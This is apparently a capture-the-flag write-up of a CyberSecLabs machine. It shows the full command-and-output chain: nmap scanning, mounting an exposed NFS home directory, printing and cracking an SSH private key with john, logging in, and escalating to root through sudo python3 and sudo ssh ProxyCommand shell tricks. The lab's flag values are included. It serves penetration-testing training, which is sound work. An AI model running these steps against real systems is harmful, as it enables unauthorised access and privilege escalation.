Tasks
NMAP ENUM
kali@kali:~/cyberseclabs$ sudo nmap -p- 172.31.1.7 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-24 09:49 EDT Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan Nmap scan report for 172.31.1.7 Host is up (0.10s latency). Not shown: 65526 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 111/tcp open rpcbind 2049/tcp open nfs 27853/tcp open unknown -> ssh 34971/tcp open unknown 36663/tcp open unknown 50727/tcp open unknown 56401/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 621.71 seconds
RPC ENUM
kali@kali:~/cyberseclabs$ mkdir /tmp/amir kali@kali:~/cyberseclabs$ sudo mount -t nfs 172.31.1.7:/home/amir /tmp/amir [sudo] password for kali:kali kali@kali:~/cyberseclabs$ cd /tmp/amir kali@kali:/tmp/amir$ ls -la total 40 drwxrwxr-x 5 kali kali 4096 Apr 2 11:43 . drwxrwxrwt 14 root root 4096 Jun 25 10:01 .. -rw-r--r-- 1 kali kali 0 Apr 2 11:46 .bash_history -rw-r--r-- 1 kali kali 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 kali kali 3786 Apr 2 11:46 .bashrc drw-r--r-- 2 kali kali 4096 Apr 2 10:44 .cache drw-r--r-- 3 kali kali 4096 Apr 2 10:44 .gnupg -rw-r--r-- 1 kali kali 807 Apr 4 2018 .profile drwxrwxr-x 2 kali kali 4096 Apr 2 11:20 .ssh -rw-r--r-- 1 kali kali 0 Apr 2 10:47 .sudo_as_admin_successful -rw-r--r-- 1 kali kali 7713 Apr 2 11:43 .viminfo kali@kali:/tmp/amir$ cd .ssh kali@kali:/tmp/amir/.ssh$ ls -la total 24 drwxrwxr-x 2 kali kali 4096 Apr 2 11:20 . drwxrwxr-x 5 kali kali 4096 Apr 2 11:43 .. -r-------- 1 kali kali 393 Apr 2 11:12 authorized_keys -r-------- 1 kali kali 1766 Apr 2 11:11 id_rsa -rw-r--r-- 1 kali kali 1766 Apr 2 11:20 id_rsa.bak -r-------- 1 kali kali 393 Apr 2 11:11 id_rsa.pub
kali@kali:/tmp/amir/.ssh$ cat id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,8D55B7449F8965162DA3B7F2F017FC21 2lI1tgSF61MjFg2Er22GWr9hImJbuZ01I556yFoLAGNj/95ZB2H8Er9u8wfMgr8z uB8Yuw2GmO0jJguQ4CK36kDLT/hpG5AW5WfHASzePHx58Ol2hrH+2e5IAoIwcVmi bFN3zIYYCznn6bIvRaqwkuxaD01EG8IPxgAvm0Nr3sP539wngplyf7/+xqvPyT18 jT058FEMPFmeb+V0MHczlNWOW6wrGnxQAea2ON+IUwiSsTVSLv4QLGVWF8Lcualy t4+4Kr47gdlxRh9HcNDztfIztimMdGp8AdV5z4KDKyL6FUVfmZqC2nxhbFUKtF7k su7qHGpV9p9Pkglx+/rUq9NeifFcRGrhsOWctUXmWJ7BbmrqFgw1+X8ui6A/uttE R8hEblI4obffLnGDrAO4wuH+qtA2oelwwjl/JxyqwbGH4RGAW/4AseqDzQ6RpfgQ Sq8wBPb5MMp2ZKEzEl8qcWcwS1FCGz/VPHpnEYwfpFlcJ1kpqkiT5gmNrDFauN1m upeSS7T5iAeHHmskbHJfNNSGYjSbTRzCSFlq2vCNXGte7jta34YCVucNHBIUR/2y GLrm3CmVYPrjdw0irwDt+uepPfUyQQLhSqiZdbyGiljlUeij5+zJax7tOjlBBjBS Y0rMRwiG8FGDEBbSmDZk30qB3Qb9TQcaqe9Wi/liFuxVyfbukiGW2b65JGbd7R1q Vh6pKw4Hd35iGmVskme7evsSupEMOu9fKsJAkIrQTxadpU8wG2wkp0NTM7fh3aut TDGKorRXOXj+cV6zehjXUYyUTesTMDh9EUVmHuixvIFX8V3w562BV28murByt7I+ ubvmZxjvh51nzpOJa4g61tnj/4OCbhFCEK4nsExh0HS11WeDAvueDauLk2Wgiw/z /yyssrshPiXe/vxYGFJlHelyDaUSwpdrZ0AGzwUutN0rOrh3yS6yTDH2raLSa76y e1bxe+rh2Q/iEhzqa1RbWrg7fA+5FJRLAZdYlaqlEsVt81nw4mdBCpjEbUl19egF xIqogCAilFWvnZQ4f12JPmk0mke84idw76+SdBeof18gGiR3mWn3IyoFLRacMs5N 4zrNBXOGCVVzXCoo88ioYw1I91O57c0vbx8S40SbIevUprphf3VTZlyrRxw2AB/R zclXHN/fEewst2maxauD+32Krm1uvTcCNk3CNre7NwPb6tB0rY3R3E7h2S/MKt0Y eZKbFFmLwnokHqzSI8uIy8wrPj6H9R+wxT0+/KPyi3L7JIbParsHO4flBx1sMCUl jlSNW/3J2ADP7QKA5AyjVcsIbp/aXyeJKCtglRc4Yl8mEmCroe61pCDO0mnatWxF Y9/z6VRC61sjO4T1xYcGFSlVeXANuN8TYR8mUyvruG8OoNQ65RvgxSCRPzFe4EAm xmXIQ4pDW59LSO7PnPdjsGN8eY7xTnG5509DYK6FoUC0T8hjp/wR9ucKDDqQoXpW BM9cM5IPltG+wAlP39EbGMinnqgqDazWAk/wSKo4ieGLnWcNORe7Ti299tImCy0l 8zJWICDbH7bSMYyVPlWBrgUBWQ6xFI55iKdhjhlQdblZI04DoSathKFe+Khjb8bi -----END RSA PRIVATE KEY----- kali@kali:/tmp/amir/.ssh$
CRACK THE “ID_RSA” PASSPHRASE WITH JOHN
kali@kali:~/cyberseclabs$ python ssh2john.py id_rsa > id_rsa.hash kali@kali:~/cyberseclabs$ john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status hello6 (id_rsa) 1g 0:00:00:10 DONE (2020-06-25 10:08) 0.09157g/s 1313Kp/s 1313Kc/s 1313KC/sa6_123..*7¡Vamos! Session completed kali@kali:~/cyberseclabs$
SSH CONNECT TO MACHINE WITH ID_RSA
(SSH is not on its default port; per the Nmap scan above it is listening on port 27853.)
kali@kali:~/cyberseclabs$ ssh -i id_rsa amir@172.31.1.7 -p 27853 Enter passphrase for key 'id_rsa':hello6 Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Jun 25 13:59:46 UTC 2020 System load: 0.0 Processes: 105 Usage of /: 39.2% of 9.78GB Users logged in: 0 Memory usage: 34% IP address for eth0: 172.31.1.7 Swap usage: 0% 21 packages can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jun 25 13:00:51 2020 from 172.31.249.99 amir@shares:~$
access.txt is not among amir's files, so first try the `sudo -l` command
https://gtfobins.github.io/gtfobins/python/#sudo
amir@shares:/tmp$ sudo -l Matching Defaults entries for amir on shares: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User amir may run the following commands on shares: (ALL : ALL) ALL (amy) NOPASSWD: /usr/bin/pkexec (amy) NOPASSWD: /usr/bin/python3 amir@shares:/home$ sudo -u amy /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")' amy@shares:/home$ ls amir amy amy@shares:/home$ ls -la total 16 drwxr-xr-x 4 root root 4096 Apr 2 15:28 . drwxr-xr-x 24 root root 4096 Apr 2 14:34 .. drwxrwxr-x 5 amir amir 4096 Apr 2 15:43 amir drwxr-xr-- 2 amy amy 4096 Apr 2 15:41 amy amy@shares:/home$ cd amy amy@shares:/home/amy$ ls access.txt amy@shares:/home/amy$ ls access.txt amy@shares:/home/amy$ cat access.txt dc17a108efc49710e2fd5450c492231c
FOR ROOT ACCESS
https://gtfobins.github.io/gtfobins/ssh/#sudo
amy@shares:/home/amy$ sudo -l Matching Defaults entries for amy on shares: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User amy may run the following commands on shares: (ALL) NOPASSWD: /usr/bin/ssh amy@shares:/home/amy$ sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x # id uid=0(root) gid=0(root) groups=0(root) # whoami root # bash root@shares:/home/amy# cd /root root@shares:/root# ls -la total 28 drwx------ 3 root root 4096 Apr 2 15:39 . drwxr-xr-x 24 root root 4096 Apr 2 14:34 .. -rw------- 1 root root 78 Apr 2 15:46 .bash_history -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwx------ 2 root root 4096 Apr 2 14:43 .ssh -rw-r--r-- 1 root root 33 Apr 2 15:39 system.txt root@shares:/root# cat system.txt b910aca7fe5e6fcb5b0d1554f66c1506 root@shares:/root#
Author – Puckiestyle